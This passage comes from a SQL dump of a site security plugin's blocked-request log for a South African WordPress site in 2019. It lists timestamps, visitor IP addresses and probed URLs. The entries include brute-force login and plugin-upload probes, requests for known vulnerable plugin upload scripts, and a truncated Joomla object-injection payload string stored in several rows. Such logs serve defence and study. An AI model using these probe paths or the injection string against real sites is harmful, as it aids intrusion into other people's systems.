02:25:48','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1130,'2019-05-16 02:25:49','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1131,'2019-05-16 02:31:08','124.156.208.61','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1132,'2019-05-16 02:31:32','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1133,'2019-05-16 02:31:33','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1134,'2019-05-16 14:57:45','204.191.85.34','http://smithandsmith.co.za/wp-login.php','404shield',''),(1135,'2019-05-16 14:57:49','204.191.85.34','http://smithandsmith.co.za/wp-login.php','404shield',''),(1136,'2019-05-16 14:57:50','204.191.85.34','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1137,'2019-05-16 14:58:36','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1138,'2019-05-16 14:58:38','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1139,'2019-05-16 14:59:37','14.143.30.202','http://smithandsmith.co.za/wp-login.php','404shield',''),(1140,'2019-05-16 15:00:49','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1141,'2019-05-16 15:01:31','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1142,'2019-05-16 16:57:08','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1143,'2019-05-16 16:57:13','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1144,'2019-05-16 17:02:27','185.22.174.65','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1145,'2019-05-16 17:02:50','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1146,'2019-05-16 17:02:51','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1147,'2019-05-16 17:19:21','104.148.64.26','http://www.smithandsmith.co.za/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','404shield',''),(1148,'2019-05-16 20:03:35','23.96.14.105','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1149,'2019-05-16 20:04:09','1.175.133.36','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1150,'2019-05-16 20:04:34','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1151,'2019-05-16 20:04:41','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1152,'2019-05-16 20:06:39','223.255.127.58','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1153,'2019-05-16 20:06:42','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1154,'2019-05-16 20:06:43','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1155,'2019-05-16 22:04:40','157.230.10.36','http://smithandsmith.co.za/wp-login.php','404shield',''),(1156,'2019-05-16 22:04:42','157.230.10.36','http://smithandsmith.co.za/wp-login.php','404shield',''),(1157,'2019-05-16 22:04:42','157.230.10.36','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1158,'2019-05-16 22:05:38','39.137.107.98','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1159,'2019-05-16 22:06:40','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1160,'2019-05-16 22:06:56','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1161,'2019-05-16 22:08:47','157.230.222.118','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1162,'2019-05-16 22:08:47','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1163,'2019-05-16 22:08:49','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1164,'2019-05-16 22:58:58','104.148.64.26','http://smithandsmith.co.za/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','404shield',''),(1165,'2019-05-17 12:40:27','87.207.198.51','http://smithandsmith.co.za/wp-login.php','404shield',''),(1166,'2019-05-17 14:50:57','39.50.239.239','http://smithandsmith.co.za/wp-login.php','404shield',''),(1167,'2019-05-17 20:11:20','37.79.244.120','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1168,'2019-05-17 20:15:28','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1169,'2019-05-17 20:16:04','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1170,'2019-05-18 01:31:59','158.69.247.45','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1171,'2019-05-18 01:31:59','158.69.247.45','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1172,'2019-05-18 11:20:52','114.113.222.226','http://smithandsmith.co.za/wp-login.php','404shield',''),(1173,'2019-05-18 11:21:04','114.113.222.226','http://smithandsmith.co.za/wp-login.php','404shield',''),(1174,'2019-05-18 11:21:13','114.113.222.226','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1175,'2019-05-18 11:21:57','180.97.70.98','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1176,'2019-05-18 11:23:03','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1177,'2019-05-18 11:23:04','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1178,'2019-05-18 11:26:25','60.11.31.169','http://smithandsmith.co.za/wp-login.php','404shield',''),(1179,'2019-05-18 11:26:49','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1180,'2019-05-18 11:26:49','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1181,'2019-05-19 03:05:02','190.138.214.59','http://smithandsmith.co.za/wp-login.php','404shield',''),(1182,'2019-05-19 17:45:48','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1183,'2019-05-19 17:46:54','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1184,'2019-05-19 18:36:24','101.251.215.232','http://smithandsmith.co.za/wp-login.php','404shield',''),(1185,'2019-05-19 18:36:26','101.251.215.232','http://smithandsmith.co.za/wp-login.php','404shield',''),(1186,'2019-05-19 18:36:27','101.251.215.232','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1187,'2019-05-19 18:37:28','111.26.9.28','http://smithandsmith.co.za/wp-login.php','404shield',''),(1188,'2019-05-19 18:37:30','111.26.9.28','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1189,'2019-05-19 18:38:22','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1190,'2019-05-19 18:38:51','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1191,'2019-05-20 05:55:08','51.38.186.234','http://smithandsmith.co.za/wp-admin/setup-config.php?step=1','404shield',''),(1192,'2019-05-20 05:55:09','51.38.186.234','http://smithandsmith.co.za/wp-admin/setup-config.php?step=2','404shield',''),(1193,'2019-05-20 05:55:10','51.38.186.234','http://smithandsmith.co.za/wp-admin/install.php','404shield',''),(1194,'2019-05-20 20:09:18','134.209.209.76','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1195,'2019-05-20 20:10:34','1.20.97.216','http://smithandsmith.co.za/wp-login.php','404shield',''),(1196,'2019-05-20 20:10:37','1.20.97.216','http://smithandsmith.co.za/wp-login.php','404shield',''),(1197,'2019-05-20 20:10:39','1.20.97.216','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1198,'2019-05-20 20:11:10','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1199,'2019-05-20 20:11:37','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1200,'2019-05-20 20:13:42','119.98.215.192','http://smithandsmith.co.za/wp-login.php','404shield',''),(1201,'2019-05-20 20:13:44','119.98.215.192','http://smithandsmith.co.za/wp-login.php','404shield',''),(1202,'2019-05-20 20:13:45','119.98.215.192','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1203,'2019-05-20 20:14:59','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1204,'2019-05-20 20:15:21','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1205,'2019-05-20 22:48:31','158.69.247.45','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1206,'2019-05-20 22:48:32','158.69.247.45','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1207,'2019-05-21 21:09:45','185.206.225.176','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1208,'2019-05-21 21:09:46','185.206.225.176','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1209,'2019-05-22 13:43:31','159.65.73.129','http://smithandsmith.co.za//wp-login.php','404shield',''),(1210,'2019-05-22 20:57:32','197.86.194.59','http://smithandsmith.co.za/wp-login.php','404shield',''),(1211,'2019-05-24 08:58:45','149.202.62.72','http://www.smithandsmith.co.za/wp-admin/setup-config.php?step=1','404shield',''),(1212,'2019-05-24 08:58:46','149.202.62.72','http://www.smithandsmith.co.za/wp-admin/setup-config.php?step=2','404shield',''),(1213,'2019-05-24 08:58:47','149.202.62.72','http://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(1214,'2019-05-26 11:12:54','194.28.128.62','http://smithandsmith.co.za/wp-login.php','404shield',''),(1215,'2019-05-26 11:17:50','37.182.228.238','http://smithandsmith.co.za/wp-login.php','404shield',''),(1216,'2019-05-29 23:44:57','82.49.74.217','http://smithandsmith.co.za/wp-login.php','404shield',''),(1217,'2019-05-31 13:25:26','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(1218,'2019-05-31 13:25:27','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(1219,'2019-05-31 18:52:33','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(1220,'2019-05-31 18:52:34','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(1221,'2019-06-01 06:35:44','105.226.28.156','http://smithandsmith.co.za/wp-login.php','404shield',''),(1222,'2019-06-01 12:36:08','87.20.165.21','http://smithandsmith.co.za/wp-login.php','404shield',''),(1223,'2019-06-03 03:20:06','82.117.210.134','http://smithandsmith.co.za/wp-login.php','404shield',''),(1224,'2019-06-03 14:31:58','105.184.160.156','http://smithandsmith.co.za/wp-login.php','404shield',''),(1225,'2019-06-03 19:25:52','94.54.225.111','http://smithandsmith.co.za/wp-login.php','404shield',''),(1226,'2019-06-04 00:54:08','88.251.201.220','http://smithandsmith.co.za/wp-login.php','404shield',''),(1227,'2019-06-05 23:16:07','126.141.211.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(1228,'2019-06-07 01:15:26','41.66.219.16','http://smithandsmith.co.za/wp-login.php','404shield',''),(1229,'2019-06-07 01:15:30','41.66.219.16','http://smithandsmith.co.za/wp-login.php','404shield',''),(1230,'2019-06-07 01:15:35','41.66.219.16','http://smithandsmith.co.za/wp-login.php','404shield',''),(1231,'2019-06-08 01:45:13','190.154.193.79','http://smithandsmith.co.za/wp-login.php','404shield',''),(1232,'2019-06-12 07:57:38','188.52.11.167','http://smithandsmith.co.za/wp-login.php','404shield',''),(1233,'2019-06-12 13:18:07','195.154.183.53','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1234,'2019-06-12 13:18:08','195.154.183.53','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1235,'2019-06-12 13:18:40','195.154.183.53','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1236,'2019-06-13 03:38:40','23.247.81.42','http://smithandsmith.co.za/wp-content/plugins/page-flip-image-gallery/upload.php','404shield',''),(1237,'2019-06-17 15:46:17','93.136.24.62','http://smithandsmith.co.za/wp-login.php','404shield',''),(1238,'2019-06-18 20:59:04','110.159.88.142','http://smithandsmith.co.za/wp-login.php','404shield',''),(1239,'2019-06-27 02:34:45','88.189.52.205','http://smithandsmith.co.za/wp-login.php','404shield',''),(1240,'2019-06-27 18:29:04','80.2.215.248','http://smithandsmith.co.za/wp-login.php','404shield',''),(1241,'2019-07-01 03:25:24','185.86.79.15','http://smithandsmith.co.za/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(1242,'2019-07-02 05:12:33','147.126.185.218','https://smithandsmith.co.za//wp-admin/wp.php?act=ul','404shield',''),(1243,'2019-07-02 05:27:31','80.225.142.214','http://smithandsmith.co.za//wp-admin/wp.php?act=ul','404shield',''),(1244,'2019-07-03 06:54:46','185.86.79.15','http://smithandsmith.co.za/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(1245,'2019-07-04 16:19:59','41.66.246.35','http://smithandsmith.co.za/wp-login.php','404shield',''),(1246,'2019-07-04 16:20:02','41.66.246.35','http://smithandsmith.co.za/wp-login.php','404shield',''),(1247,'2019-07-04 16:20:05','41.66.246.35','http://smithandsmith.co.za/wp-login.php','404shield',''),(1248,'2019-07-10 01:13:11','89.211.116.11','http://smithandsmith.co.za/wp-login.php','404shield',''),(1249,'2019-07-10 22:06:42','190.207.118.47','http://smithandsmith.co.za/wp-login.php','404shield',''),(1250,'2019-07-12 03:37:14','185.86.79.15','http://smithandsmith.co.za/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(1251,'2019-07-12 15:02:03','5.155.141.158','http://smithandsmith.co.za/wp-login.php','404shield',''),(1252,'2019-07-14 15:58:13','91.205.168.41','http://smithandsmith.co.za/wp-login.php','404shield',''),(1253,'2019-07-15 19:09:31','35.222.7.17','http://smithandsmith.co.za/wp-login.php','404shield',''),(1254,'2019-07-17 19:57:14','83.166.240.162','http://smithandsmith.co.za/wp-login.php','404shield',''),(1255,'2019-07-17 19:57:15','83.166.240.162','http://smithandsmith.co.za/wp-login.php','404shield',''),(1256,'2019-07-17 19:57:16','83.166.240.162','http://smithandsmith.co.za/wp-login.php','404shield',''),(1257,'2019-07-17 21:49:29','46.105.127.166','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1258,'2019-07-17 21:49:29','46.105.127.166','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1259,'2019-07-18 08:50:52','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1260,'2019-07-18 08:50:53','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1261,'2019-07-18 12:30:12','193.110.107.210','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(1262,'2019-07-18 12:30:13','193.110.107.210','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(1263,'2019-07-18 12:30:14','193.110.107.210','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(1264,'2019-07-22 16:25:13','5.36.198.138','http://smithandsmith.co.za/wp-login.php','404shield',''),(1265,'2019-07-23 09:52:52','213.87.157.144','http://smithandsmith.co.za/wp-login.php','404shield',''),(1266,'2019-07-23 09:52:54','213.87.157.144','http://smithandsmith.co.za/wp-login.php','404shield',''),(1267,'2019-07-23 09:53:10','213.87.157.144','http://smithandsmith.co.za/wp-login.php','404shield',''),(1268,'2019-07-27 01:09:43','106.52.155.37','http://www.smithandsmith.co.za/wp-content/themes/AdvanceImage5/header.php','404shield',''),(1269,'2019-07-28 00:26:30','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1270,'2019-07-28 00:26:59','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1271,'2019-07-28 02:58:24','180.190.54.165','http://smithandsmith.co.za/wp-login.php','404shield',''),(1272,'2019-07-28 19:52:11','69.12.72.186','http://smithandsmith.co.za/wp-content/plugins/xichang/x.php?xi','404shield',''),(1273,'2019-07-29 08:08:38','196.70.31.180','http://smithandsmith.co.za/wp-login.php','404shield',''),(1274,'2019-07-29 13:51:18','176.31.123.76','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1275,'2019-07-29 13:51:18','176.31.123.76','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1276,'2019-07-31 16:30:53','188.101.188.119','http://smithandsmith.co.za/wp-login.php','404shield',''),(1277,'2019-08-03 18:01:58','78.85.168.36','http://www.smithandsmith.co.za//wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css','404shield',''),(1278,'2019-08-05 17:00:07','192.99.35.149','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1279,'2019-08-05 17:00:07','192.99.35.149','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1280,'2019-08-05 17:54:00','192.99.35.149','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1281,'2019-08-05 17:54:00','192.99.35.149','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1282,'2019-08-05 17:54:50','192.99.35.149','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1283,'2019-08-05 17:58:18','200.105.157.218','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1284,'2019-08-06 00:33:18','43.231.77.236','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(1285,'2019-08-06 00:33:19','43.231.77.236','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(1286,'2019-08-06 00:33:19','43.231.77.236','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(1287,'2019-08-06 15:30:37','46.105.99.212','http://smithandsmith.co.za/wp-login.php','404shield',''),(1288,'2019-08-06 15:30:50','46.105.99.212','http://smithandsmith.co.za/wp-login.php','404shield',''),(1289,'2019-08-06 15:30:53','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1290,'2019-08-06 15:32:13','37.232.163.156','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1291,'2019-08-06 15:32:29','96.9.79.218','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1292,'2019-08-07 10:30:30','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1293,'2019-08-07 10:30:31','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1294,'2019-08-09 11:39:08','78.85.231.170','http://www.smithandsmith.co.za//wp-content/plugins/WP_Estimation_Form/assets/css/lfb_frontendPackedLibs.min.css','404shield',''),(1295,'2019-08-09 14:36:56','167.160.1.74','http://smithandsmith.co.za/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(1296,'2019-08-10 20:51:54','197.95.192.51','http://smithandsmith.co.za/wp-login.php','404shield',''),(1297,'2019-08-13 22:09:28','94.29.204.186','http://smithandsmith.co.za/wp-login.php','404shield',''),(1298,'2019-08-14 07:13:05','78.85.128.175','http://www.smithandsmith.co.za//wp-content/uploads/license.php','404shield',''),(1299,'2019-08-15 13:37:22','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1300,'2019-08-15 13:37:23','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1301,'2019-08-17 16:19:37','176.185.230.124','http://smithandsmith.co.za/wp-login.php','404shield',''),(1302,'2019-08-19 20:30:42','45.171.156.180','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(1303,'2019-08-19 21:02:47','109.193.116.17','http://smithandsmith.co.za/wp-login.php','404shield',''),(1304,'2019-08-23 07:20:25','102.165.120.24','http://smithandsmith.co.za/wp-login.php','404shield',''),(1305,'2019-08-23 20:44:43','107.172.3.128','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1306,'2019-08-23 20:44:44','107.172.3.128','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1307,'2019-08-24 03:46:53','112.209.211.52','http://smithandsmith.co.za/wp-login.php','404shield',''),(1308,'2019-08-24 16:56:27','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1309,'2019-08-24 16:56:28','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1310,'2019-08-24 17:10:30','107.172.3.128','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(1311,'2019-08-24 17:10:31','107.172.3.128','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(1312,'2019-08-24 19:59:42','212.219.197.184','http://smithandsmith.co.za/wp-content/themes/ut-gogreen/addpress/includes/ap_fileupload.php','404shield',''),(1313,'2019-08-25 16:57:26','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1314,'2019-08-25 16:57:28','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1315,'2019-08-25 16:59:57','46.105.99.212','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1316,'2019-08-25 17:00:39','46.105.99.212','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1317,'2019-08-25 17:20:45','46.105.99.212','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1318,'2019-08-25 17:20:46','46.105.99.212','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1319,'2019-08-25 17:31:58','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1320,'2019-08-25 17:34:50','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1321,'2019-08-25 17:35:08','125.26.197.47','https://smithandsmith.co.za/wp-login.php','404shield',''),(1322,'2019-08-25 17:36:10','46.105.99.212','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1323,'2019-08-25 17:39:17','190.149.165.154','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1324,'2019-08-25 17:43:49','185.22.174.65','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1325,'2019-08-25 18:29:12','224.181.221.247','https://smithandsmith.co.za//wp-admin/wp.php?act=ul','404shield',''),(1326,'2019-08-31 22:30:42','203.99.191.188','http://smithandsmith.co.za/wp-login.php','404shield',''),(1327,'2019-08-31 23:08:02','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1328,'2019-08-31 23:08:32','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1329,'2019-09-01 11:41:54','78.85.224.164','http://www.smithandsmith.co.za//wp-content/uploads/license.php','404shield',''),(1330,'2019-09-02 09:28:47','39.120.234.41','http://smithandsmith.co.za/wp-login.php','404shield',''),(1331,'2019-09-03 06:04:27','111.231.90.37','http://www.smithandsmith.co.za/wp-content/themes/AdvanceImage5/functions.php','404shield',''),(1332,'2019-09-03 09:57:11','185.132.0.125','http://smithandsmith.co.za/wp-login.php','404shield',''),(1333,'2019-09-03 18:46:18','78.85.212.49','http://www.smithandsmith.co.za//wp-content/plugins/revslider/license.php','404shield',''),(1334,'2019-09-04 17:54:49','190.114.180.51','http://smithandsmith.co.za/wp-login.php','404shield',''),(1335,'2019-09-06 19:39:34','172.105.79.92','http://smithandsmith.co.za/administrator/','adminpw',''),(1336,'2019-09-06 19:39:36','172.105.79.92','http://smithandsmith.co.za/administrator/','adminpw',''),(1337,'2019-09-06 22:33:13','106.53.118.74','http://www.smithandsmith.co.za/wp-content/themes/AdvanceImage5/header.php','404shield',''),(1338,'2019-09-09 15:53:17','182.74.220.58','http://smithandsmith.co.za/wp-login.php','404shield',''),(1339,'2019-09-09 20:15:47','94.66.222.252','http://smithandsmith.co.za/wp-login.php','404shield',''),(1340,'2019-09-10 00:54:49','181.52.21.247','http://smithandsmith.co.za/wp-login.php','404shield',''),(1341,'2019-09-11 19:49:04','103.56.183.7','http://smithandsmith.co.za/wp-login.php','404shield',''),(1342,'2019-09-12 19:06:21','78.85.137.107','http://www.smithandsmith.co.za//wp-content/plugins/WP_Estimation_Form/assets/css/lfb_frontendPackedLibs.min.css','404shield',''),(1343,'2019-09-13 13:37:12','65.60.27.157','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1344,'2019-09-13 16:03:53','92.63.194.45','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1345,'2019-09-14 08:35:10','182.68.38.184','http://smithandsmith.co.za/wp-login.php','404shield',''),(1346,'2019-09-15 11:16:06','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1347,'2019-09-15 11:16:06','}__test|O:21:\"JDatabaseDriverMysqli\":3:{','http://smithandsmith.co.za/','muashield',''),(1348,'2019-09-21 12:50:08','46.153.80.178','http://smithandsmith.co.za/wp-login.php','404shield',''),(1349,'2019-09-22 06:01:37','93.199.244.201','http://smithandsmith.co.za/wp-login.php','404shield',''),(1350,'2019-09-22 17:26:27','103.250.157.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(1351,'2019-09-22 17:26:28','103.250.157.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(1352,'2019-09-22 17:26:30','103.250.157.38','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1353,'2019-09-23 01:28:42','203.195.168.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(1354,'2019-09-23 01:31:15','203.195.168.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(1355,'2019-09-23 01:34:13','203.195.168.154','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1356,'2019-09-25 08:27:51','203.92.44.2','http://smithandsmith.co.za/wp-login.php','404shield',''),(1357,'2019-09-25 15:08:46','78.85.138.163','http://www.smithandsmith.co.za//wp-content/plugins/WP_Estimation_Form/assets/css/lfb_frontendPackedLibs.min.css','404shield',''),(1358,'2019-10-01 16:03:48','80.28.243.202','http://smithandsmith.co.za/wp-login.php','404shield',''),(1359,'2019-10-01 16:07:49','192.99.15.141','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1360,'2019-10-01 16:10:06','192.99.15.141','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1361,'2019-10-01 16:12:39','148.103.9.41','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1362,'2019-10-01 19:28:07','192.99.35.149','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1363,'2019-10-02 15:11:53','197.204.17.205','http://smithandsmith.co.za/wp-login.php','404shield',''),(1364,'2019-10-03 01:05:22','45.136.108.44','http://smithandsmith.co.za/wp-content/plugins/profile-builder/assets/css/style-front-end.css','404shield',''),(1365,'2019-10-03 02:33:16','88.99.2.180','http://smithandsmith.co.za/wp-login.php','404shield',''),(1366,'2019-10-05 01:27:17','194.61.24.94','http://smithandsmith.co.za/wp-content/plugins/job-board-manager/assets/front/css/registration-form.css','404shield',''),(1367,'2019-10-09 14:30:47','185.162.142.81','http://smithandsmith.co.za/wp-login.php','404shield',''),(1368,'2019-10-09 14:32:30','185.162.142.81','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1369,'2019-10-09 14:33:43','198.27.70.61','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1370,'2019-10-09 14:35:52','198.27.70.61','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1371,'2019-10-09 14:38:14','51.79.24.128','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1372,'2019-10-09 14:40:08','181.57.151.214','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1373,'2019-10-09 14:40:43','125.24.61.241','https://smithandsmith.co.za/wp-login.php','404shield',''),(1374,'2019-10-09 14:41:41','125.24.61.241','https://smithandsmith.co.za/wp-login.php','404shield',''),(1375,'2019-10-09 14:42:30','125.24.61.241','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1376,'2019-10-09 14:43:45','198.27.70.61','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1377,'2019-10-09 14:45:31','198.27.70.61','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1378,'2019-10-09 